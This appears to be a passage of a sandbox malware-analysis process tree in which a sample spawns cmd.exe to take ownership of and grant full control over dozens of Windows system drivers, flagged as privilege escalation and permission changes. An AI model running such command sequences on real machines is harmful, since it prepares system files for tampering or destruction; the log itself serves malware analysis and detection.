C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rasl2tp.sys && icacls C:\Windows\System32\drivers\rasl2tp.sys /grant "%username%:F" && exit2⤵PID:4324
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rasl2tp.sys3⤵PID:5868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\raspppoe.sys && icacls C:\Windows\System32\drivers\raspppoe.sys /grant "%username%:F" && exit2⤵PID:4360
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\raspppoe.sys3⤵PID:5856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\raspptp.sys && icacls C:\Windows\System32\drivers\raspptp.sys /grant "%username%:F" && exit2⤵PID:4400
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\raspptp.sys3⤵PID:5944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rassstp.sys && icacls C:\Windows\System32\drivers\rassstp.sys /grant "%username%:F" && exit2⤵PID:4432
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rassstp.sys3⤵PID:6064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdbss.sys && icacls C:\Windows\System32\drivers\rdbss.sys /grant "%username%:F" && exit2⤵PID:4448
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdbss.sys3⤵PID:5888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpbus.sys && icacls C:\Windows\System32\drivers\rdpbus.sys /grant "%username%:F" && exit2⤵PID:4488
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdpbus.sys3⤵PID:6112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPCDD.sys && icacls C:\Windows\System32\drivers\RDPCDD.sys /grant "%username%:F" && exit2⤵PID:4540
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\RDPCDD.sys3⤵PID:3316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpdr.sys && icacls C:\Windows\System32\drivers\rdpdr.sys /grant "%username%:F" && exit2⤵PID:4584
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdpdr.sys3⤵PID:6076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPENCDD.sys && icacls C:\Windows\System32\drivers\RDPENCDD.sys /grant "%username%:F" && exit2⤵PID:4608
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\RDPENCDD.sys3⤵PID:6084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPREFMP.sys && icacls C:\Windows\System32\drivers\RDPREFMP.sys /grant "%username%:F" && exit2⤵PID:4640
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\RDPREFMP.sys3⤵PID:3348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpvideominiport.sys && icacls C:\Windows\System32\drivers\rdpvideominiport.sys /grant "%username%:F" && exit2⤵PID:4656
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdpvideominiport.sys3⤵PID:4788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpwd.sys && icacls C:\Windows\System32\drivers\rdpwd.sys /grant "%username%:F" && exit2⤵PID:4688
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdpwd.sys3⤵
- Modifies file permissions
PID:5460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdyboost.sys && icacls C:\Windows\System32\drivers\rdyboost.sys /grant "%username%:F" && exit2⤵PID:4704
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdyboost.sys3⤵
- Modifies file permissions
PID:3592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rmcast.sys && icacls C:\Windows\System32\drivers\rmcast.sys /grant "%username%:F" && exit2⤵PID:4740
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rmcast.sys3⤵PID:5768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RNDISMP.sys && icacls C:\Windows\System32\drivers\RNDISMP.sys /grant "%username%:F" && exit2⤵PID:4756
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\RNDISMP.sys3⤵PID:5404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rootmdm.sys && icacls C:\Windows\System32\drivers\rootmdm.sys /grant "%username%:F" && exit2⤵PID:4776
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rootmdm.sys3⤵
- Possible privilege escalation attempt
PID:1956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rspndr.sys && icacls C:\Windows\System32\drivers\rspndr.sys /grant "%username%:F" && exit2⤵PID:4796
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rspndr.sys3⤵PID:3988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Rtnic64.sys && icacls C:\Windows\System32\drivers\Rtnic64.sys /grant "%username%:F" && exit2⤵PID:4816
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Rtnic64.sys3⤵PID:5988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sbp2port.sys && icacls C:\Windows\System32\drivers\sbp2port.sys /grant "%username%:F" && exit2⤵PID:4864
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sbp2port.sys3⤵
- Possible privilege escalation attempt
PID:6164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\scfilter.sys && icacls C:\Windows\System32\drivers\scfilter.sys /grant "%username%:F" && exit2⤵PID:4892
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\scfilter.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\scsiport.sys && icacls C:\Windows\System32\drivers\scsiport.sys /grant "%username%:F" && exit2⤵PID:4932
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\scsiport.sys3⤵PID:6252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\secdrv.sys && icacls C:\Windows\System32\drivers\secdrv.sys /grant "%username%:F" && exit2⤵PID:4980
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\secdrv.sys3⤵
- Modifies file permissions
PID:6308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\serenum.sys && icacls C:\Windows\System32\drivers\serenum.sys /grant "%username%:F" && exit2⤵PID:5000
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\serenum.sys3⤵
- Possible privilege escalation attempt
PID:6244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\serial.sys && icacls C:\Windows\System32\drivers\serial.sys /grant "%username%:F" && exit2⤵PID:5016
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\serial.sys3⤵
- Possible privilege escalation attempt
PID:6372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sermouse.sys && icacls C:\Windows\System32\drivers\sermouse.sys /grant "%username%:F" && exit2⤵PID:5044
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sermouse.sys3⤵PID:6320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffdisk.sys && icacls C:\Windows\System32\drivers\sffdisk.sys /grant "%username%:F" && exit2⤵PID:5064
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sffdisk.sys3⤵PID:6352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffp_mmc.sys && icacls C:\Windows\System32\drivers\sffp_mmc.sys /grant "%username%:F" && exit2⤵PID:5088
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sffp_mmc.sys3⤵PID:6460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffp_sd.sys && icacls C:\Windows\System32\drivers\sffp_sd.sys /grant "%username%:F" && exit2⤵PID:5112
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sffp_sd.sys3⤵PID:6400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sfloppy.sys && icacls C:\Windows\System32\drivers\sfloppy.sys /grant "%username%:F" && exit2⤵PID:3980
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sfloppy.sys3⤵PID:6508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sisraid2.sys && icacls C:\Windows\System32\drivers\sisraid2.sys /grant "%username%:F" && exit2⤵PID:3476
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sisraid2.sys3⤵PID:6620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sisraid4.sys && icacls C:\Windows\System32\drivers\sisraid4.sys /grant "%username%:F" && exit2⤵PID:3676
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sisraid4.sys3⤵PID:6520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\smb.sys && icacls C:\Windows\System32\drivers\smb.sys /grant "%username%:F" && exit2⤵PID:3868
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\smb.sys3⤵PID:6556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\smclib.sys && icacls C:\Windows\System32\drivers\smclib.sys /grant "%username%:F" && exit2⤵PID:4012
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\smclib.sys3⤵PID:6628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\spldr.sys && icacls C:\Windows\System32\drivers\spldr.sys /grant "%username%:F" && exit2⤵PID:836
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\spldr.sys3⤵PID:6680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\spsys.sys && icacls C:\Windows\System32\drivers\spsys.sys /grant "%username%:F" && exit2⤵PID:2612
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\spsys.sys3⤵PID:6760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srv.sys && icacls C:\Windows\System32\drivers\srv.sys /grant "%username%:F" && exit2⤵PID:2044
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\srv.sys3⤵PID:6716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srv2.sys && icacls C:\Windows\System32\drivers\srv2.sys /grant "%username%:F" && exit2⤵PID:2276
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\srv2.sys3⤵PID:6724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srvnet.sys && icacls C:\Windows\System32\drivers\srvnet.sys /grant "%username%:F" && exit2⤵PID:2828
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\srvnet.sys3⤵PID:6796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\stexstor.sys && icacls C:\Windows\System32\drivers\stexstor.sys /grant "%username%:F" && exit2⤵PID:1728
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\stexstor.sys3⤵PID:6776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\storport.sys && icacls C:\Windows\System32\drivers\storport.sys /grant "%username%:F" && exit2⤵PID:3372
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\storport.sys3⤵PID:6856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\storvsc.sys && icacls C:\Windows\System32\drivers\storvsc.sys /grant "%username%:F" && exit2⤵PID:748
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\storvsc.sys3⤵PID:6948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\stream.sys && icacls C:\Windows\System32\drivers\stream.sys /grant "%username%:F" && exit2⤵PID:4228
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\stream.sys3⤵PID:6844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\swenum.sys && icacls C:\Windows\System32\drivers\swenum.sys /grant "%username%:F" && exit2⤵PID:4396
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\swenum.sys3⤵PID:6872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Synth3dVsc.sys && icacls C:\Windows\System32\drivers\Synth3dVsc.sys /grant "%username%:F" && exit2⤵PID:4748
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Synth3dVsc.sys3⤵PID:6968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tape.sys && icacls C:\Windows\System32\drivers\tape.sys /grant "%username%:F" && exit2⤵PID:4948
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tape.sys3⤵
- Possible privilege escalation attempt
PID:7016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tcpip.sys && icacls C:\Windows\System32\drivers\tcpip.sys /grant "%username%:F" && exit2⤵PID:5080
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tcpip.sys3⤵PID:7076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tcpipreg.sys && icacls C:\Windows\System32\drivers\tcpipreg.sys /grant "%username%:F" && exit2⤵PID:3612
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tcpipreg.sys3⤵
- Modifies file permissions
PID:5412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdi.sys && icacls C:\Windows\System32\drivers\tdi.sys /grant "%username%:F" && exit2⤵PID:5144
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdi.sys3⤵
- Possible privilege escalation attempt
PID:7164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdpipe.sys && icacls C:\Windows\System32\drivers\tdpipe.sys /grant "%username%:F" && exit2⤵PID:5220
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdpipe.sys3⤵PID:7128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdtcp.sys && icacls C:\Windows\System32\drivers\tdtcp.sys /grant "%username%:F" && exit2⤵PID:5240
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdtcp.sys3⤵
- Possible privilege escalation attempt
PID:4248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdx.sys && icacls C:\Windows\System32\drivers\tdx.sys /grant "%username%:F" && exit2⤵PID:5268
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdx.sys3⤵
- Modifies file permissions
PID:5456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\termdd.sys && icacls C:\Windows\System32\drivers\termdd.sys /grant "%username%:F" && exit2⤵PID:5292
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\termdd.sys3⤵
- Possible privilege escalation attempt
PID:656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\terminpt.sys && icacls C:\Windows\System32\drivers\terminpt.sys /grant "%username%:F" && exit2⤵PID:5328
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\terminpt.sys3⤵PID:6424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tssecsrv.sys && icacls C:\Windows\System32\drivers\tssecsrv.sys /grant "%username%:F" && exit2⤵PID:5344
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tssecsrv.sys3⤵PID:6192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\TsUsbFlt.sys && icacls C:\Windows\System32\drivers\TsUsbFlt.sys /grant "%username%:F" && exit2⤵PID:5372
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\TsUsbFlt.sys3⤵PID:4528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\TsUsbGD.sys && icacls C:\Windows\System32\drivers\TsUsbGD.sys /grant "%username%:F" && exit2⤵PID:5396
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\TsUsbGD.sys3⤵PID:4652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tsusbhub.sys && icacls C:\Windows\System32\drivers\tsusbhub.sys /grant "%username%:F" && exit2⤵PID:5416
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tsusbhub.sys3⤵PID:5832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tunnel.sys && icacls C:\Windows\System32\drivers\tunnel.sys /grant "%username%:F" && exit2⤵PID:5444
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tunnel.sys3⤵
- Possible privilege escalation attempt
PID:3224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\UAGP35.SYS && icacls C:\Windows\System32\drivers\UAGP35.SYS /grant "%username%:F" && exit2⤵PID:5476
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\UAGP35.SYS3⤵PID:6152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\udfs.sys && icacls C:\Windows\System32\drivers\udfs.sys /grant "%username%:F" && exit2⤵PID:5504
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\udfs.sys3⤵PID:740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ULIAGPKX.SYS && icacls C:\Windows\System32\drivers\ULIAGPKX.SYS /grant "%username%:F" && exit2⤵PID:5524
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ULIAGPKX.SYS3⤵
- Modifies file permissions
PID:4928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\umbus.sys && icacls C:\Windows\System32\drivers\umbus.sys /grant "%username%:F" && exit2⤵PID:5540
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\umbus.sys3⤵PID:5076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\umpass.sys && icacls C:\Windows\System32\drivers\umpass.sys /grant "%username%:F" && exit2⤵PID:5604
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\umpass.sys3⤵PID:4260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usb8023.sys && icacls C:\Windows\System32\drivers\usb8023.sys /grant "%username%:F" && exit2⤵PID:5644
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usb8023.sys3⤵PID:1520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\USBCAMD2.sys && icacls C:\Windows\System32\drivers\USBCAMD2.sys /grant "%username%:F" && exit2⤵PID:5660
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\USBCAMD2.sys3⤵PID:4296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbccgp.sys && icacls C:\Windows\System32\drivers\usbccgp.sys /grant "%username%:F" && exit2⤵PID:5676
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbccgp.sys3⤵PID:4300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbcir.sys && icacls C:\Windows\System32\drivers\usbcir.sys /grant "%username%:F" && exit2⤵PID:5712
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbcir.sys3⤵PID:7176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbd.sys && icacls C:\Windows\System32\drivers\usbd.sys /grant "%username%:F" && exit2⤵PID:5728
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbd.sys3⤵PID:4424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbehci.sys && icacls C:\Windows\System32\drivers\usbehci.sys /grant "%username%:F" && exit2⤵PID:5760
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbehci.sys3⤵PID:7248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbhub.sys && icacls C:\Windows\System32\drivers\usbhub.sys /grant "%username%:F" && exit2⤵PID:5772
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbhub.sys3⤵PID:7292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbohci.sys && icacls C:\Windows\System32\drivers\usbohci.sys /grant "%username%:F" && exit2⤵PID:5788
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbohci.sys3⤵PID:7268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbport.sys && icacls C:\Windows\System32\drivers\usbport.sys /grant "%username%:F" && exit2⤵PID:5836
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbport.sys3⤵PID:7276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbprint.sys && icacls C:\Windows\System32\drivers\usbprint.sys /grant "%username%:F" && exit2⤵PID:5900
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbprint.sys3⤵
- Modifies file permissions
PID:7284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbrpm.sys && icacls C:\Windows\System32\drivers\usbrpm.sys /grant "%username%:F" && exit2⤵PID:5936
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbrpm.sys3⤵PID:7348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\USBSTOR.SYS && icacls C:\Windows\System32\drivers\USBSTOR.SYS /grant "%username%:F" && exit2⤵PID:5980
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\USBSTOR.SYS3⤵
- Modifies file permissions
PID:7400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbuhci.sys && icacls C:\Windows\System32\drivers\usbuhci.sys /grant "%username%:F" && exit2⤵PID:6016
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbuhci.sys3⤵PID:7432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vdrvroot.sys && icacls C:\Windows\System32\drivers\vdrvroot.sys /grant "%username%:F" && exit2⤵PID:6028
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vdrvroot.sys3⤵PID:7372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vga.sys && icacls C:\Windows\System32\drivers\vga.sys /grant "%username%:F" && exit2⤵PID:6092
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vga.sys3⤵PID:7504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vgapnp.sys && icacls C:\Windows\System32\drivers\vgapnp.sys /grant "%username%:F" && exit2⤵PID:6120
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vgapnp.sys3⤵
- Modifies file permissions
PID:7520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vhdmp.sys && icacls C:\Windows\System32\drivers\vhdmp.sys /grant "%username%:F" && exit2⤵PID:6132
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vhdmp.sys3⤵PID:7456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\viaide.sys && icacls C:\Windows\System32\drivers\viaide.sys /grant "%username%:F" && exit2⤵PID:3148
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\viaide.sys3⤵PID:7472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\videoprt.sys && icacls C:\Windows\System32\drivers\videoprt.sys /grant "%username%:F" && exit2⤵PID:3208
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\videoprt.sys3⤵
- Possible privilege escalation attempt
PID:7528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vmbus.sys && icacls C:\Windows\System32\drivers\vmbus.sys /grant "%username%:F" && exit2⤵PID:3272
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vmbus.sys3⤵
- Modifies file permissions
PID:7512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\VMBusHID.sys && icacls C:\Windows\System32\drivers\VMBusHID.sys /grant "%username%:F" && exit2⤵PID:4888
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\VMBusHID.sys3⤵
- Possible privilege escalation attempt
PID:7588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vms3cap.sys && icacls C:\Windows\System32\drivers\vms3cap.sys /grant "%username%:F" && exit2⤵PID:3888
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vms3cap.sys3⤵PID:7612
-
-
-
